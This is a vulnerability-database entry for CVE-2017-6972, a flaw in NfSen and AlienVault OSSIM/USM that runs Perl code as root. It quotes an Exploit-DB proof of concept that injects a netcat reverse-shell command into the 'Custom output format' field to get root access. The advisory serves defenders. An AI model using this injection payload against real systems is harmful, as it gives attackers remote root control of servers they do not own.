CVE-2017-6972
Description
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 have an error in privilege dropping and unnecessarily execute the NfSen Perl code as root, aka AlienVault ID ENG-104945, a different vulnerability than CVE-2017-6970 and CVE-2017-6971.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection
# Exploit Title: NfSen/AlienVault remote root exploit (command injection in customfmt parameter)
# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
# Version: AlienVault USM/OSSIM < 4.3.1
# Date: 2017-07-10
# Vendor Homepage: http://nfsen.sourceforge.net/
# Vendor Homepage: http://www.alienvault.com/
# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Tested on: NfSen 1.3.7
# CVE: CVE-2017-7175, CVE-2017-6972
1. Description
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972.
2. Proof of Concept
For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the "Custom output format:" input box:
'; nc -ne /bin/bash 10.100.1.2 443 #
If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability.
3. Solution:
Update to latest version of NfSen/USM/OSSIMApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| alienvault | ossim | {"endIncluding":"5.3.6"} | |
| alienvault | unified_security_management | {"endIncluding":"5.3.6"} | |
| nfsen | nfsen | {"endIncluding":"1.3.7"} | |
References
- http://www.securityfocus.com/bid/97016
- https://sourceforge.net/p/nfsen/news/2017/01/nfsen-138-released---security-fix/
- https://www.alienvault.com/forums/discussion/8698
- https://www.exploit-db.com/exploits/42314/
- http://www.securityfocus.com/bid/97016
- https://sourceforge.net/p/nfsen/news/2017/01/nfsen-138-released---security-fix/
- https://www.alienvault.com/forums/discussion/8698
- https://www.exploit-db.com/exploits/42314/
CWEs
CWE-273
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.